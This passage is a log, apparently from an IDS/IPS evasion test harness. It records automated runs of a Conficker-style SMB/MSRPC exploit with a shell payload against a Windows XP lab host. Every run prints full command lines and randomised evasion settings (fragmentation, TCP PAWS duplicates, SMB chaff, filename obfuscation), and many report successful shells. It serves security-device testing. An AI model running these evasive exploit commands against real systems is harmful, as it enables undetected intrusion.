  4577. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4578. Info: Sending MSRPC request with exploit
  4579. Info: Shell found, attack succeeded
  4580. Info: Shell closed
  4581. 0: Success.
  4582. ......
  4583. 7838 runs averaging 1.94 runs / second ; progress: 4038/43200.....
  4584. 7843 runs averaging 1.94 runs / second ; progress: 4043/43200.2015-06-08 00:26:53 INFO
  4585. Success. (10.62.90.117):
  4586. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40870 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=SXLFlo5iPRg --evasion=[smb_connect,msrpc_bind]smb_decoytrees,"1","3","5","random_alphanum" --evasion=[smb_openpipe,end]tcp_paws,"75%","8","random_alphanum" --verifydelay=1000 --payload=shell
  4587. Info: Using random seed SXLFlo5iPRh
  4588. The following evasions are applied from stage smb_connect to msrpc_bind:
  4589. - Before normal SMB writes, 1 SMB trees are opened and 3 writes are performed to them. The write payload is 5 random alphanumeric bytes.
  4590. The following evasions are applied from stage smb_openpipe to end:
  4591. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 8> and has random alphanumeric bytes as payload
  4592.  
  4593. Info: NetBIOS connection 10.62.90.117:40870 -> 10.35.1.207:445
  4594. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4595. Info: Sending MSRPC request with exploit
  4596. Info: Shell found, attack succeeded
  4597. Info: Shell closed
  4598. 0: Success.
  4599. ...........
  4600. 7856 runs averaging 1.94 runs / second ; progress: 4048/43200...............2015-06-08 00:27:03 INFO
  4601. Success. (10.62.90.112):
  4602. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=34053 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=Gnk5u9SA84k --evasion=[msrpc_bind,end]smb_decoytrees,"5","5","3","random_msrpcreq" --evasion=[netbios_connect,smb_openpipe]tcp_paws,"25%","171738880","unmodified" --verifydelay=1000 --payload=shell
  4603. Info: Using random seed Gnk5u9SA84k
  4604. The following evasions are applied from stage netbios_connect to smb_openpipe:
  4605.  
  4606. The following evasions are applied from stage msrpc_bind to end:
  4607. - Before normal SMB writes, 5 SMB trees are opened and 5 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
  4608.  
  4609. Info: NetBIOS connection 10.62.90.112:34053 -> 10.35.1.207:445
  4610. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4611. Info: Sending MSRPC request with exploit
  4612. Info: Shell found, attack succeeded
  4613. Info: Shell closed
  4614. 0: Success.
  4615.  
  4616. 7872 runs averaging 1.94 runs / second ; progress: 4053/43200.......
  4617. 7879 runs averaging 1.94 runs / second ; progress: 4058/43200.......
  4618. 7886 runs averaging 1.94 runs / second ; progress: 4063/43200.....2015-06-08 00:27:17 INFO
  4619. Success. (10.62.90.119):
  4620. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=23024 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=QyM7Ixajmbw --evasion=[smb_connect,smb_opentree]smb_chaff,"75%","write_flag","zero" --evasion=[msrpc_bind,end]tcp_paws,"25%","33949496","zero" --verifydelay=1000 --payload=shell
  4621. Info: Using random seed QyM7Ixajmbx
  4622. The following evasions are applied from stage smb_connect to smb_opentree:
  4623. - 75% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  4624. The following evasions are applied from stage msrpc_bind to end:
  4625. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 33949496> and has 0x00 bytes as payload
  4626.  
  4627. Info: NetBIOS connection 10.62.90.119:23024 -> 10.35.1.207:445
  4628. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4629. Info: Sending MSRPC request with exploit
  4630. Info: Shell found, attack succeeded
  4631. Info: Shell closed
  4632. 0: Success.
  4633.  
  4634. 7892 runs averaging 1.94 runs / second ; progress: 4068/43200.....
  4635. 7897 runs averaging 1.94 runs / second ; progress: 4073/43200....
  4636. 7901 runs averaging 1.94 runs / second ; progress: 4078/43200....
  4637. 7905 runs averaging 1.94 runs / second ; progress: 4083/43200
  4638. 7905 runs averaging 1.93 runs / second ; progress: 4088/43200..
  4639. 7907 runs averaging 1.93 runs / second ; progress: 4093/43200....
  4640. 7911 runs averaging 1.93 runs / second ; progress: 4098/43200.....
  4641. 7916 runs averaging 1.93 runs / second ; progress: 4103/43200........
  4642. 7924 runs averaging 1.93 runs / second ; progress: 4108/43200Pid 30195 timed out - killed
  4643. 2015-06-08 00:27:59 INFO
  4644. Timed out (10.62.90.111):
  4645. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=28186 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=n/6DiCvgfXw --evasion=[smb_connect,msrpc_req]ipv4_frag,"80" --evasion=[netbios_connect,msrpc_bind]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
  4646. Info: Using random seed n/6DiCvgfXy
  4647. The following evasions are applied from stage netbios_connect to msrpc_bind:
  4648. - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
  4649. The following evasions are applied from stage smb_connect to msrpc_req:
  4650. - IPv4 fragments with at most 80 bytes per fragment
  4651.  
  4652. Info: NetBIOS connection 10.62.90.111:28186 -> 10.35.1.207:445
  4653. Terminated
  4654. .........
  4655. 7934 runs averaging 1.93 runs / second ; progress: 4113/43200.......Pid 30292 timed out - killed
  4656. 2015-06-08 00:28:06 INFO
  4657. Timed out (10.62.90.118):
  4658. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49892 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=Z7tH6rtzJ0E --evasion=[smb_connect,smb_openpipe]ipv4_opt,"75%","inc","alpharandomized" --evasion=[smb_openpipe,msrpc_bind]tcp_overlap,"9","new","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"25%","random_alphanum" --verifydelay=1000 --payload=shell
  4659. Info: Using random seed Z7tH6rtzJ0F
  4660. The following evasions are applied from stage smb_connect to smb_openpipe:
  4661. - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  4662. The duplicate packet has identical payload except that alphabetic characters are randomized
  4663. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  4664. - TCP segments are set to overlap by 9 bytes, with the later packet containing the correct payload. Overlapping part has random alphanumeric bytes as payload
  4665. The following evasions are applied from stage smb_openpipe to end:
  4666. - 25% probability to add a random alphanumeric urgent data byte to a TCP segment.
  4667.  
  4668. Info: NetBIOS connection 10.62.90.118:49892 -> 10.35.1.207:445
  4669. Terminated
  4670. .....
  4671. 7947 runs averaging 1.93 runs / second ; progress: 4118/43200.............
  4672. 7960 runs averaging 1.93 runs / second ; progress: 4123/43200........Pid 30548 timed out - killed
  4673. 2015-06-08 00:28:16 INFO
  4674. Timed out (10.62.90.114):
  4675. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=40982 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=4MS2bDmeUFo --evasion=[msrpc_req,end]ipv4_frag,"40" --evasion=[smb_openpipe,end]tcp_urgent,"1","random" --verifydelay=1000 --payload=shell
  4676. Info: Using random seed 4MS2bDmeUFr
  4677. The following evasions are applied from stage smb_openpipe to end:
  4678. - Add a random urgent data byte to every 1 TCP segment.
  4679. The following evasions are applied from stage msrpc_req to end:
  4680. - IPv4 fragments with at most 40 bytes per fragment
  4681.  
  4682. Info: NetBIOS connection 10.62.90.114:40982 -> 10.35.1.207:445
  4683. Terminated
  4684. .........
  4685. 7978 runs averaging 1.93 runs / second ; progress: 4128/43200...................
  4686. 7997 runs averaging 1.93 runs / second ; progress: 4133/43200............................
  4687. 8025 runs averaging 1.94 runs / second ; progress: 4138/43200..............
  4688. 8039 runs averaging 1.94 runs / second ; progress: 4143/43200....
  4689. 8043 runs averaging 1.94 runs / second ; progress: 4148/43200........
  4690. 8051 runs averaging 1.94 runs / second ; progress: 4153/43200...............
  4691. 8066 runs averaging 1.94 runs / second ; progress: 4158/43200............
  4692. 8078 runs averaging 1.94 runs / second ; progress: 4163/43200..............
  4693. 8092 runs averaging 1.94 runs / second ; progress: 4168/43200...............
  4694. 8107 runs averaging 1.94 runs / second ; progress: 4173/43200..........
  4695. 8117 runs averaging 1.94 runs / second ; progress: 4178/43200.........
  4696. 8126 runs averaging 1.94 runs / second ; progress: 4183/43200............
  4697. 8138 runs averaging 1.94 runs / second ; progress: 4188/43200..........
  4698. 8148 runs averaging 1.94 runs / second ; progress: 4193/43200....
  4699. 8152 runs averaging 1.94 runs / second ; progress: 4198/43200..Pid 31832 timed out - killed
  4700. 2015-06-08 00:29:31 INFO
  4701. Timed out (10.62.90.113):
  4702. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=57268 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=uLFl/pvqX9E --evasion=[msrpc_req,end]smb_fnameobf,"add_paths|add_null_trailer" --evasion=[smb_connect,smb_openpipe]tcp_paws,"75%","268435455","random_alpha" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
  4703. Info: Using random seed uLFl/pvqX9G
  4704. The following evasions are applied from stage smb_connect to smb_openpipe:
  4705. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
  4706. The following evasions are applied from stage smb_openpipe to msrpc_req:
  4707. - 25% probability to add a random alphaurgent data byte to a TCP segment.
  4708. The following evasions are applied from stage msrpc_req to end:
  4709. - The SMB filename is obfuscated:
  4710. * Dummy paths are added ( a/b -> a/c/../b )
  4711. * A 0x00 and random alphanumeric characters are appended to the filename
  4712.  
  4713. Info: NetBIOS connection 10.62.90.113:57268 -> 10.35.1.207:445
  4714. Terminated
  4715. ..
  4716. 8157 runs averaging 1.94 runs / second ; progress: 4203/43200........
  4717. 8165 runs averaging 1.94 runs / second ; progress: 4208/43200..............
  4718. 8179 runs averaging 1.94 runs / second ; progress: 4213/43200....Pid 32234 timed out - killed
  4719. 2015-06-08 00:29:45 INFO
  4720. Timed out (10.62.90.116):
  4721. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25299 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=aed0q+Kl1ig --evasion=[start,end]tcp_inittsopt,"enable","zero" --evasion=[smb_opentree,end]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  4722. Info: Using random seed aed0q+Kl1ih
  4723. - TCP timestamps enabled, initial TCP timestamp is set to normal ( ie. taken from the timestamp clock ).
  4724. The following evasions are applied from stage smb_opentree to end:
  4725. - Add a random urgent data byte to every 2 TCP segment.
  4726.  
  4727. Info: NetBIOS connection 10.62.90.116:25299 -> 10.35.1.207:445
  4728. Terminated
  4729. .....2015-06-08 00:29:47 INFO
  4730. Success. (10.62.90.118):
  4731. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47685 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=y67+vnvZhII --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","4","alphanumrandomized" --evasion=[smb_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  4732. Info: Using random seed y67+vnvZhIL
  4733. The following evasions are applied from stage smb_connect to msrpc_bind:
  4734. - TCP timestamps echo reply value is sent in the wrong endianness
  4735. The following evasions are applied from stage smb_openpipe to msrpc_req:
  4736. - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has original payload with alphanumeric bytes randomized
  4737.  
  4738. Info: NetBIOS connection 10.62.90.118:47685 -> 10.35.1.207:445
  4739. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4740. Info: Sending MSRPC request with exploit
  4741. Info: Shell found, attack succeeded
  4742. Info: Shell closed
  4743. 0: Success.
  4744. ......
  4745. 8196 runs averaging 1.94 runs / second ; progress: 4218/43200...................
  4746. 8215 runs averaging 1.95 runs / second ; progress: 4223/43200...............
  4747. 8230 runs averaging 1.95 runs / second ; progress: 4228/43200.......2015-06-08 00:30:02 INFO
  4748. Success. (10.62.90.112):
  4749. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=10344 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=36UEqLYSE18 --evasion=[smb_opentree,msrpc_req]tcp_paws,"3","9","random_alpha" --evasion=[msrpc_bind,end]tcp_urgent,"25%","zero" --verifydelay=1000 --payload=shell
  4750. Info: Using random seed 36UEqLYSE1/
  4751. The following evasions are applied from stage smb_opentree to msrpc_req:
  4752. - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alpha bytes as payload
  4753. The following evasions are applied from stage msrpc_bind to end:
  4754. - 25% probability to add a zero urgent data byte to a TCP segment.
  4755.  
  4756. Info: NetBIOS connection 10.62.90.112:10344 -> 10.35.1.207:445
  4757. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4758. Info: Sending MSRPC request with exploit
  4759. Info: Shell found, attack succeeded
  4760. Info: Shell closed
  4761. 0: Success.
  4762. 2015-06-08 00:30:02 INFO
  4763. Success. (10.62.90.114):
  4764. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=50948 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=aHMCcAh1EZg --evasion=[smb_connect,smb_openpipe]ipv4_opt,"1","inc","shuffletcp" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","268435455","random_alpha" --verifydelay=1000 --payload=shell
  4765. Info: Using random seed aHMCcAh1EZh
  4766. The following evasions are applied from stage smb_connect to smb_openpipe:
  4767. - Every 1th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  4768. The duplicate packet has shuffled TCP payload
  4769. The following evasions are applied from stage smb_opentree to msrpc_req:
  4770. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
  4771.  
  4772. Info: NetBIOS connection 10.62.90.114:50948 -> 10.35.1.207:445
  4773. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4774. Info: Sending MSRPC request with exploit
  4775. Info: Shell found, attack succeeded
  4776. Info: Shell closed
  4777. 0: Success.
  4778. ..
  4779. 8241 runs averaging 1.95 runs / second ; progress: 4234/43200.2015-06-08 00:30:04 INFO
  4780. Success. (10.62.90.114):
  4781. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58105 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=TJu3ax2/y1E --evasion=[smb_connect,smb_openpipe]ipv4_opt,"50%","inc","random_alphanum" --evasion=[msrpc_bind,end]tcp_paws,"1","2","shuffle" --verifydelay=1000 --payload=shell
  4782. Info: Using random seed TJu3ax2/y1F
  4783. The following evasions are applied from stage smb_connect to smb_openpipe:
  4784. - 50% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  4785. The duplicate packet has random alphanumeric bytes as payload
  4786. The following evasions are applied from stage msrpc_bind to end:
  4787. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has shuffled original payload
  4788.  
  4789. Info: NetBIOS connection 10.62.90.114:58105 -> 10.35.1.207:445
  4790. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4791. Info: Sending MSRPC request with exploit
  4792. Info: Shell found, attack succeeded
  4793. Info: Shell closed
  4794. 0: Success.
  4795. .2015-06-08 00:30:07 INFO
  4796. Success. (10.62.90.114):
  4797. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=51356 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=FeVeSaOFJ/M --evasion=[smb_connect,msrpc_bind]ipv4_opt,"13","inc","random_alpha" --evasion=[netbios_connect,end]tcp_paws,"75%","5","shuffle" --verifydelay=1000 --payload=shell
  4798. Info: Using random seed FeVeSaOFJ/M
  4799. The following evasions are applied from stage netbios_connect to end:
  4800. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 5> and has shuffled original payload
  4801. The following evasions are applied from stage smb_connect to msrpc_bind:
  4802. - Every 13th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  4803. The duplicate packet has random alphabetic bytes as payload
  4804.  
  4805. Info: NetBIOS connection 10.62.90.114:51356 -> 10.35.1.207:445
  4806. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4807. Info: Sending MSRPC request with exploit
  4808. Info: Shell found, attack succeeded
  4809. Info: Shell closed
  4810. 0: Success.
  4811. .
  4812. 8246 runs averaging 1.95 runs / second ; progress: 4239/43200............
  4813. 8258 runs averaging 1.95 runs / second ; progress: 4244/43200......
  4814. 8264 runs averaging 1.95 runs / second ; progress: 4249/43200..........
  4815. 8274 runs averaging 1.95 runs / second ; progress: 4254/43200..
  4816. 8276 runs averaging 1.94 runs / second ; progress: 4259/43200........
  4817. 8284 runs averaging 1.94 runs / second ; progress: 4264/43200.......
  4818. 8291 runs averaging 1.94 runs / second ; progress: 4269/43200.......2015-06-08 00:30:42 INFO
  4819. Success. (10.62.90.116):
  4820. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55922 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=1c9Z+P8xUFc --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"5","3","8","random_msrpcbind" --evasion=[smb_openpipe,end]smb_fnameobf,"change_case|add_paths" --verifydelay=1000 --payload=shell
  4821. Info: Using random seed 1c9Z+P8xUFf
  4822. The following evasions are applied from stage smb_openpipe to end:
  4823. - The SMB filename is obfuscated:
  4824. * Random characters case is changed
  4825. * Dummy paths are added ( a/b -> a/c/../b )
  4826. The following evasions are applied from stage msrpc_bind to msrpc_req:
  4827. - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
  4828.  
  4829. Info: NetBIOS connection 10.62.90.116:55922 -> 10.35.1.207:445
  4830. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4831. Info: Sending MSRPC request with exploit
  4832. Info: Shell found, attack succeeded
  4833. Info: Shell closed
  4834. 0: Success.
  4835. ..
  4836. 8301 runs averaging 1.94 runs / second ; progress: 4274/43200.....
  4837. 8306 runs averaging 1.94 runs / second ; progress: 4279/43200...........
  4838. 8317 runs averaging 1.94 runs / second ; progress: 4284/43200........
  4839. 8325 runs averaging 1.94 runs / second ; progress: 4289/432002015-06-08 00:30:59 INFO
  4840. Success. (10.62.90.112):
  4841. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=44164 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=5Lqf8qkQDN4 --evasion=[msrpc_bind,end]netbios_chaff,"50%","empty_keepalive|msrpc_req|broken_length" --evasion=[msrpc_req,end]tcp_paws,"75%","6","random_alphanum" --verifydelay=1000 --payload=shell
  4842. Info: Using random seed 5Lqf8qkQDN7
  4843. The following evasions are applied from stage msrpc_bind to end:
  4844. - 50% probability to send a chaff NetBIOS message before an actual NetBIOS message. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
  4845. The following evasions are applied from stage msrpc_req to end:
  4846. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has random alphanumeric bytes as payload
  4847.  
  4848. Info: NetBIOS connection 10.62.90.112:44164 -> 10.35.1.207:445
  4849. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4850. Info: Sending MSRPC request with exploit
  4851. Info: Shell found, attack succeeded
  4852. Info: Shell closed
  4853. 0: Success.
  4854. ...2015-06-08 00:31:01 INFO
  4855. Success. (10.62.90.112):
  4856. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=26976 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=0CPbLvEWtYI --evasion=[start,end]tcp_paws,"1","3","alpharandomized" --evasion=[smb_opentree,end]tcp_paws,"5","159580752","unmodified" --verifydelay=1000 --payload=shell
  4857. Info: Using random seed 0CPbLvEWtYL
  4858. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has original payload with alphabetic bytes randomized
  4859. The following evasions are applied from stage smb_opentree to end:
  4860.  
  4861.  
  4862. Info: NetBIOS connection 10.62.90.112:26976 -> 10.35.1.207:445
  4863. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4864. Info: Sending MSRPC request with exploit
  4865. Info: Shell found, attack succeeded
  4866. Info: Shell closed
  4867. 0: Success.
  4868. .
  4869. 8331 runs averaging 1.94 runs / second ; progress: 4294/43200
  4870. 8331 runs averaging 1.94 runs / second ; progress: 4299/43200........
  4871. 8339 runs averaging 1.94 runs / second ; progress: 4304/43200...............
  4872. 8354 runs averaging 1.94 runs / second ; progress: 4309/43200...............
  4873. 8369 runs averaging 1.94 runs / second ; progress: 4314/43200....
  4874. 8373 runs averaging 1.94 runs / second ; progress: 4319/43200.....
  4875. 8378 runs averaging 1.94 runs / second ; progress: 4324/43200......Pid 1662 timed out - killed
  4876. 2015-06-08 00:31:38 INFO
  4877. Timed out (10.62.90.110):
  4878. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25353 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=fWA5nBt8494 --evasion=[msrpc_bind,msrpc_req]smb_fnameobf,"change_case|add_paths" --evasion=[smb_connect,end]tcp_paws,"5","238199066","random_alpha" --evasion=[smb_opentree,end]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
  4879. Info: Using random seed fWA5nBt8495
  4880. The following evasions are applied from stage smb_connect to end:
  4881. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 238199066> and has random alpha bytes as payload
  4882. The following evasions are applied from stage smb_opentree to end:
  4883. - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
  4884. The following evasions are applied from stage msrpc_bind to msrpc_req:
  4885. - The SMB filename is obfuscated:
  4886. * Random characters case is changed
  4887. * Dummy paths are added ( a/b -> a/c/../b )
  4888.  
  4889. Info: NetBIOS connection 10.62.90.110:25353 -> 10.35.1.207:445
  4890. Terminated
  4891.  
  4892. 8385 runs averaging 1.94 runs / second ; progress: 4329/43200.....
  4893. 8390 runs averaging 1.94 runs / second ; progress: 4334/43200.
  4894. 8391 runs averaging 1.93 runs / second ; progress: 4339/43200.......
  4895. 8398 runs averaging 1.93 runs / second ; progress: 4344/43200............
  4896. 8410 runs averaging 1.93 runs / second ; progress: 4349/43200..........Pid 2268 timed out - killed
  4897. 2015-06-08 00:32:02 INFO
  4898. Timed out (10.62.90.117):
  4899. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=55553 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=kxyX01oYSMk --evasion=[smb_opentree,end]smb_chaff,"13","write_flag","alphanum" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
  4900. Info: Using random seed kxyX01oYSMm
  4901. The following evasions are applied from stage smb_connect to msrpc_bind:
  4902. - 50% probability to add a random alphaurgent data byte to a TCP segment.
  4903. The following evasions are applied from stage smb_opentree to end:
  4904. - Before every 13th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random alphanumeric payload
  4905.  
  4906. Info: NetBIOS connection 10.62.90.117:55553 -> 10.35.1.207:445
  4907. Terminated
  4908. 2015-06-08 00:32:02 INFO
  4909. Success. (10.62.90.110):
  4910. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=53177 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=sooPHhEIT8g --evasion=[smb_connect,end]ipv4_frag,"104" --evasion=[smb_opentree,end]smb_decoytrees,"5","2","3","random_msrpcreq" --verifydelay=1000 --payload=shell
  4911. Info: Using random seed sooPHhEIT8i
  4912. The following evasions are applied from stage smb_connect to end:
  4913. - IPv4 fragments with at most 104 bytes per fragment
  4914. The following evasions are applied from stage smb_opentree to end:
  4915. - Before normal SMB writes, 5 SMB trees are opened and 2 writes are performed to them. The write payload is 3 bytes of MSRPC request-like data.
  4916.  
  4917. Info: NetBIOS connection 10.62.90.110:53177 -> 10.35.1.207:445
  4918. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  4919. Info: Sending MSRPC request with exploit
  4920. Info: Shell found, attack succeeded
  4921. Info: Shell closed
  4922. 0: Success.
  4923. ....
  4924. 8426 runs averaging 1.94 runs / second ; progress: 4354/43200.........
  4925. 8435 runs averaging 1.94 runs / second ; progress: 4359/43200.........
  4926. 8444 runs averaging 1.93 runs / second ; progress: 4364/43200....Pid 2527 timed out - killed
  4927. 2015-06-08 00:32:18 INFO
  4928. Timed out (10.62.90.119):
  4929. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60882 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=T6XfWoQScYo --evasion=[msrpc_bind,msrpc_req]msrpc_ndrflag,"char_unspec","float_cray","byte3_nonzero","byte4_nonzero" --evasion=[smb_opentree,end]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
  4930. Info: Using random seed T6XfWoQScYp
  4931. The following evasions are applied from stage smb_opentree to end:
  4932. - Add a zero urgent data byte to every 2 TCP segment.
  4933. The following evasions are applied from stage msrpc_bind to msrpc_req:
  4934. - MSRPC NDR flag is modified:
  4935. * Unspecified character encoding
  4936. * Cray floating point value encoding
  4937. * Reserved 3rd byte is set to a random non-zero value
  4938. * Reserved 4th byte is set to a random non-zero value
  4939.  
  4940.  
  4941. Info: NetBIOS connection 10.62.90.119:60882 -> 10.35.1.207:445
  4942. Terminated
  4943. ..
  4944. 8451 runs averaging 1.93 runs / second ; progress: 4369/43200...............
  4945. 8466 runs averaging 1.94 runs / second ; progress: 4374/43200......
  4946. 8472 runs averaging 1.93 runs / second ; progress: 4379/43200
  4947. 8472 runs averaging 1.93 runs / second ; progress: 4384/43200...
  4948. 8475 runs averaging 1.93 runs / second ; progress: 4389/43200..........
  4949. 8485 runs averaging 1.93 runs / second ; progress: 4394/43200.....
  4950. 8490 runs averaging 1.93 runs / second ; progress: 4399/43200.......
  4951. 8497 runs averaging 1.93 runs / second ; progress: 4404/43200
  4952. 8497 runs averaging 1.93 runs / second ; progress: 4409/43200....
  4953. 8501 runs averaging 1.93 runs / second ; progress: 4414/43200........2015-06-08 00:33:08 INFO
  4954. Success. (10.62.90.118):
  4955. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59785 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=qI+MyxnbeGg --evasion=[start,msrpc_bind]ipv4_frag,"1464" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","5","random_alphanum" --verifydelay=1000 --payload=shell
